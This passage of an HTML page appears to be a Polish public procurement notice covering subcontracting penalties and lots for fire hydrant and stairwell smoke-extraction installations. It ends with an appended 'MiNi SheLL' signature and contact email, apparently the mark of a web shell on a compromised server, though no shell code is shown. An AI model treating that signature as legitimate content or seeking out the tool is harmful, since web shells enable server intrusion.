prawidłowego wykonania przedmiotu umowy, h) umowa o podwykonawstwo winna zawierać zapisy dot. kar
umownych z tytułu opóźnienia w realizacji zamówienia z winy podwykonawcy lub dalszego
podwykonawcy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Instalacja hydrantowa wewnętrzna i zawory hydrantowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> opracowanie dokumentacji
projektowej instalacji, - wykonanie w imieniu Zamawiającego procedury zgłoszenia i rozpoczęcia
robót, - wykonanie prac budowlanych zgodnie z zatwierdzonym projektem, - opracowanie i
przekazanie Zamawiającemu dokumentacji powykonawczej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.00.00.00-8.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Instalacja oddymiania klatek schodowych wraz z szybami windowymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> opracowanie dokumentacji
projektowej instalacji, - wykonanie w imieniu Zamawiającego procedury zgłoszenia i rozpoczęcia
robót, - wykonanie prac budowlanych zgodnie z zatwierdzonym projektem, - opracowanie i
przekazanie Zamawiającemu dokumentacji powykonawczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.00.00.00-8.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com